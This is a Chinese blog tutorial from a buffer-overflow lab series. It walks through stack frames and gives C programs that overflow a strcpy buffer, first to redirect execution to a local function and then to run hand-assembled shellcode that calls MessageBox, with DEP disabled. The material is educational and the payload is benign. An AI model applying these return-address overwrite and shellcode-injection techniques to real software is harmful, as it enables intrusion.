缓冲区溢出(栈溢出)实验 之 函数调用

最新推荐文章于 2024-05-03 15:45:34 发布
最新推荐文章于 2024-05-03 15:45:34 发布
阅读量6.9k 收藏 17
点赞数 2
分类专栏: Windows应用层开发 Windows安全 文章标签: 缓冲区溢出调用系统函数 缓冲区溢出调用函数 函数执行过程栈的变化 0Day安全 栈溢出原理与实践
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyb_l_code/article/details/81225517
版权

前言

之前介绍的的缓冲区溢出导致站内变量值被修改(缓冲区溢出(栈溢出)实验 之 改变栈内的变量

本小节介绍通过缓冲区溢出调用函数,此外通过学习也对函数栈的了解有所加深,这里加上小段自己对函数栈的理解

函数栈的介绍

通过汇编介绍函数执行过程中栈的变化:

EBP:栈底 存储着上一个栈的栈底EBP

ESP:栈顶 存储着系统栈的栈顶(函数栈形成是保存系统栈栈顶)

EIP:存储下一条将要执行指令的地址

我们习惯将栈底和栈顶之间划分为一个栈:访问栈是以栈底EBP作为基准的

调用函数(cdecl调用约定 --》 自右向左压栈 调用者负责清理传参的内存栈)

压入函数参数:

0041171E  lea         eax,[input]  

00411721  push        eax  

调用函数:

00411722  call        overflow (04112A3h)

开辟新栈:

push        ebp  //先将上一个栈的栈底保存到栈中

mov         ebp,esp  //将上一个栈的栈顶作为下一个栈的栈底即ESP赋值给EBP

之后将传递的参数压入栈中,执行函数内的指令

 

mov         esp,ebp  //将存储的上一个栈的栈顶恢复到ESP中

pop         ebp  

ret  

完成栈的恢复,函数结束

 add         esp,4 //清除掉传递参数时开辟的栈内存(此处栈顶上移四个字节) 

1、调用程序自身函数

首选上源码

#include<iostream>
#include<windows.h>
#include <string.h>
using namespace std;
int overflow(const char* input)
{
	BOOL bFlAG = TRUE;
	int nFlag = 1;
	char buf[8];

	memset(buf, 0, 8);
	printf("Virtual address of 'buf' = Ox%p\n", buf);
	printf("Virtual address of 'nFlag' = Ox%p  NUM:%d \r\n", &nFlag, nFlag);
	strcpy(buf, input);
	printf("Virtual address of 'nFlag' = Ox%p  NUM:%d \r\n", &nFlag, nFlag);
	return 0;
}
void Fun()
{
	printf("Buffer Overflow Success!\r\n");
	return;
}

int main()
{

	printf("Virtual address of 'overflow' = Ox%p\n", overflow);
	printf("Virtual address of 'overflow' = Ox%p\n", Fun);
	//注意这里ff后,但其实默认添加了’\0’在最后面
	//char input[] = "AAAAAAAB";//good input, ASCII code of 'A' is 41
//构造新的字符串
char input[] = "AAAAAAAABBBBBBBBAAAC\x46\x17\x41\x00";//0x00411570
	overflow(input);
	system("pause");
	return 0;
}

目标:更改栈的返回值,将返回值改为函数“Fun”的地址,那么当函数overflow返回时,会将返回地址填入EIP中,使得程序执行Fun函数。

 

查看的Fun的地址为0x00411570

进入overflow函数,并且在Fun函数内断点,

查看寄存器得到ESP为0x0019FE34,EBP为0x0019FE90

 

查看栈内存,标记红框的依次为ESP、buf、EBP、返回值(返回值位于EBP下的四字节内存,buf为将要分配给他的内存)

此时运行在“BOOL bFlAG = TRUE;”处

复制“strcpy(buf, input);”前内存情况

 

复制“strcpy(buf, input);”后内存情况

可看出我们将更改了buf、nFlag、bFlag、EBP的内容以及返回地址,其中返回地址修改为“Fun”函数的地址继续运行得到程序的结果如下图,该方法破坏了buf到返回地址存储位置所有的内存

我们成功的在没有调用“Fun”函数的情况下,执行了“Fun”函数

 

不过不幸的是我们破坏了栈的平衡,当程序从Fun函数中退出后,找不到下一句应该执行了语句所在的地址了,该问题导致出现以下提示:

 

问题描述:导致该问题的根源在于栈平衡被破坏,程序无法正确找到下一个执行指令

解决方案:可以在Fun函数加上exit()直接退出进程这个提示就不存在了,但是这个方法仅仅是治标不治本,我们应该去重新调节堆栈的平衡

2、通过缓冲区溢出调用系统函数(messagebox)

#include<iostream>
#include<windows.h>
#include <string.h>
using namespace std;

int overflow(const char* input)
{
	BOOL bFlAG = TRUE;
	int nFlag = 1;
	char buf[44];

	memset(buf, 0, 44);
	printf("Virtual address of 'buf' = Ox%p\n", buf);
	printf("Virtual address of 'nFlag' = Ox%p  NUM:%d \r\n", &nFlag, nFlag);
	strcpy(buf, input);
	printf("Virtual address of 'nFlag' = Ox%p  NUM:%d \r\n", &nFlag, nFlag);
	return 0;
}
void Fun()
{
	printf("Buffer Overflow Success!\r\n");
	exit(0);
	return;
}

int main()
{

	printf("Virtual address of 'overflow' = Ox%p\n", overflow);
	//加载user32.dll库
	HMODULE hUserModule = LoadLibrary("user32.dll");
	if (NULL == hUserModule)
	{
		printf("动态库加载失败BufferOverflow.cpp 错误码:%d \r\n",GetLastError());
		return 0;
	}
	printf("MessageBox Address %X\r\n", MessageBox);
	//MessageBox(NULL, "failwest", "failwest", 0);
	//printf("Virtual address of 'overflow' = Ox%p\n", Fun);
	//注意这里ff后,但其实默认添加了’\0’在最后面
	char input[] = "\x33\xDB\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50\x53\xB8\xB0\xF8\x0E\x74\xFF\xD0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x38\xFE\x19"
		
		
		;//Messagebox函数地址:0x740EF8B0
	//char input[] = "AAAAAAB";//good input, ASCII code of 'A' is 41
											  //char input[] = "AAAAAAA";//good input, ASCII code of 'A' is 41
 	overflow(input);
	system("pause");
	return 0;
}

进入overflow函数查看栈内存 ESP = 0019FDEC EBP = 0019FE6C

被标记出来的分别为ESP、EBP、函数结束后的返回地址

Shellcode如何构成

使用ebx的异或作为0使用

调用messagebox函数需要在栈中压入函数的参数(自右向左压入)

33DB XOR EBX,EBX

  1. PUSH EBX  

6877657374 PUSH 74736577

686661696C push 6C696166

将字符串传入EAX中

8BC4 mov eax,esp

53 push ebx

50 push eax

50 push eax

53 push ebx

压栈完毕调用messagebox(地址:0x740EF8B0)x0E\x74\xFF\xD0

B80E74FFD0 mov eax, 0E74FFD0 

FFD0 call eax

然后在函数返回地址处填充buf的地址

在其他非关键位置填充NOP指令,这样就够成了今天使用的shellcode

申请的buf地址为0x0019fe38,在Buf中填充执行调用系统函数的代码,然后再函数返回地址处填充上buf的地址,使得函数执行结束后跳到buf地址处继续执行我们的调用系统函数的地址。系统函数为调用messagebox函数弹出failwest提示消息。

strcpy(buf, input);”函数后

我们发现EBP后的返回地址改为buf的地址,因此程序在结束函数overflow后会调到0x0019fe38处继续执行我们精心构造的shellcode。如此就完成了通过栈溢出调用messagebox函数。

注意:此处会出现栈内存无法执行的问题,解决方案为修改 项目--》属性--》链接器--》高级--》数据执行保护(DEP)  为 否 (/NXCOMPAT:NO)

执行结果为

 

下一篇: 缓冲区溢出(栈溢出)实验 之 JMP ESP

 

开发农民
关注
  • 2
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
缓冲区溢出原理
一杯水果茶!足矣~
12-05 1061
缓冲区溢出就好比一个杯子倒太多的水,溢出来,这叫溢出。
缓冲区溢出漏洞实验报告
10-15
**缓冲区溢出漏洞实验报告** 缓冲区溢出是一种常见的软件安全漏洞,主要发生在程序处理数据时,未能正确检查输入数据的长度,导致超出预定内存分配的边界,从而覆盖相邻内存区域的数据。这种漏洞常常被恶意攻击者...
PWN基础之函数调用栈溢出
weixin_46132162的博客
12-28 1402
函数调用结束时,顶的函数(callee)状态被弹出,顶恢复到调用函数(caller)的状态函数调用在内存中从高地址向低地址生长,所以顶对应的内存地址在压时变小,退时变大。接下来vulnerable_function()函数调用read()函数,这个时候vulnerable_function()函数为主函数(caller function)read()函数为被函数(callee function)read()函数 是有参数的,我们来看一看有参数的函数函数调用是什么样的。
栈溢出笔记1.1 函数调用过程
hustd10的博客
04-09 4647
选择从栈溢出开始学习Shellcode的编写,是因为在没有保护机制(Cookie,ASLR,DEP,SafeSEH)的系统中使用栈溢出是一件很简单的事情。区随着函数调用动态变化,每个函数调用时在上占用的空间称为帧。用一个示例来说明上保存的内容及动态变化过程。 下面是一个程序,生成一个对话框显示一条“Hello World!”消息。下面是该程序的C代码: 在VS2008中用Debu
2024年网安最全计算机系统基础实训三—AttackLab实验
最新发布
2401_84281629的博客
05-03 1276
强化机器级表示、汇编语言、试器和逆向工程等方面基础知识,并结合帧工作原理实现简单的栈溢出攻击,掌握其基本攻击基本方式和原理,进一步为编程过程中应对栈溢出攻击打下一定的基础。理解缓冲区的工作原理和字符填充过程及其特点。对于无边界检测的语言及其工作方式所造成的缓冲区漏洞加深理解。通过字符串填充的方式,完成5个阶段的缓冲区攻击。分别基于基本返回地址填充、攻击代码填充、ROP等实现这5个难度递增的阶段的缓冲区溢出攻击。
缓冲区溢出栈溢出实验 之 改变内的变量
大头的博客
07-25 2141
注:本文属于个人原创,错误处请各位指正 一、缓冲区溢出 百度百科“缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,可以利用执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。” 在缓冲区填充超过变量所属内存的长度的字符,超出目标变量内存,可能导致程序出错或不可预知的结果。...
【深圳大学计算机系统2】实验缓冲区溢出攻击与堆实验
归忆_AC的博客
01-29 1539
通过反汇编,可以获得bang()函数的入口地址为0x08048e10。第一关只需要返回到指定函数,第二关不仅返回到指定函数还需要为该指定函数准备好参数,最后一关要求在返回到指定函数之前执行一段汇编代码完成全局变量的修改。另外,因为在fizz函数中取的是ebp+0x8地址中的值,而每个字节需要使用两个字符填充,因此再添加8个0,最后添加cookie的小端表示的值。两个位置相差28字节,因此构造28个任意字符,然后加上smoke()的地址,就能准确覆盖到”返回地址”,完成溢出攻击返回到smoke()。
CSAPP 缓冲区溢出炸弹 中科大实验
weixin_44639164的博客
11-08 1027
中科大CSAPP实验缓冲区溢出炸弹
网络攻防实验缓冲区溢出攻击
hxxjxw的博客
07-09 6746
这个实验是网络攻防课程实验中的一个,但是目前我还没有完全搞懂代码,以后有机会来补。也欢迎大佬指点 一、实验目的和要求 通过实验掌握缓冲区溢出原理,通过使用缓冲区溢出攻击软件模拟入侵远程主机理解缓冲区溢出危害性,并理解防范和避免缓冲区溢出攻击的措施。 二、实验原理实验环境 实验原理缓冲区溢出(Buffer Overflow)是目前非常普遍而且危...
计算机系统(2) 实验缓冲区溢出攻击实验
上山打老虎的博客
07-16 7250
计算机系统(2) 实验缓冲区溢出攻击实验一、 实验目标:二、实验环境:三、实验内容四、实验步骤和结果(一)返回到smoke(二)返回到fizz()并准备相应参数(三)返回到bang()且修改global_value五、实验总结与体会 一、 实验目标: 理解程序函数调用中参数传递机制; 掌握缓冲区溢出攻击方法; 进一步熟练掌握GDB试工具和objdump反汇编工具。 二、实验环境: 计算机(Intel CPU) Linux 64位操作系统 GDB试工具 objdump反汇编工具 三、实验内容
缓冲区溢出栈溢出原理 | 简单shellcode编写
VI___
02-02 4368
一、Buffer Overflow Vulnerability ESP:该指针永远指向系统最上面一个帧的顶 EBP:该指针永远指向系统最上面一个帧的底部 缓冲区溢出漏洞的原理就是因为输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了,当函数需要返回的时候,由于此时的返回地址是一个无效地址,因此导致程序出错。 那...
缓冲区溢出利用实验(详细步骤)
02-23
由于程序的运行机制,假设利用 strcpy()函数进行字符串赋值,因定义的字符 串及输入字符串长度不一致或过长,从而占用了 ebp(底)和 call(函数)返回地址的 区。基于此可利用修改的函数调用结束后的返回地址...
缓冲区溢出实验.docx
06-23
通过这样的实验,可以深入理解缓冲区溢出的不同类型及其原理,学习如何防范这类安全问题。在实际开发中,遵循良好的编程习惯,使用安全函数,并进行代码审查,能够有效减少缓冲区溢出的风险。
安全编程之缓冲区溢出.7z
08-20
**安全编程之缓冲区溢出** 在IT领域,安全编程是一项至关重要的技能,尤其是在系统和应用程序设计中。缓冲区溢出是其中最常见的安全漏洞之一,它可能导致数据丢失、程序崩溃,甚至恶意代码执行,对系统安全构成严重...
缓冲区溢出漏洞研究与进展.pdf
10-29
1.1 **堆栈溢出攻击**:这是最常见的溢出类型,如图所示,当函数调用时,参数、返回地址、前一个的指针以及本地变量被压入中。如果一个函数(如strcpy)没有检查输入字符串的长度,那么过长的字符串会覆盖返回...
简单的TCP客户端发包工具
热门推荐
大头的博客
07-26 2万+
一、TCP介绍 先放这里有时间在写,最近在写DuiLib相关的使用内容,这部分大家凑活着看 二、程序截图 下载链接 链接:https://pan.baidu.com/s/1MzNUzwd7WwBat6vNMcu6Ow 密码:ibuv   主要源码: //.h // TCPClient.cpp : 定义应用程序的类行为。 // #include "stdafx.h" #in...
w32time服务自动更新时间(NTP)
大头的博客
04-12 9944
简介NTP:“用来使计算机时间同步化的一种协议”功能要求:开机后自动更新时间,定时与时间服务器校正时间实现:同步频率项:SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpClient值:SpecialPollInterval数据:1800(30X60秒)设置自启动项:SYSTEM\\CurrentControlSet\\...
缓冲区溢出栈溢出实验 之 JMP ESP
大头的博客
07-27 9579
3、缓冲区溢出之JMP ESP 本文属于原创,如有错误请指正。其中引用他人的部分已经标出,如涉及版权问题请联系本人 这里不得不讲一讲JMP ESP的原理了,在实验之前我一直没看懂他是如何试下跳转ESP之后回到执行我们的shellcode的。在实验中你仔细观看会发现随着函数的销毁ESP是在变化的,JMP ESP正式利用这种变化,将我们精心准备的shellcode执行。   JMP ES...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值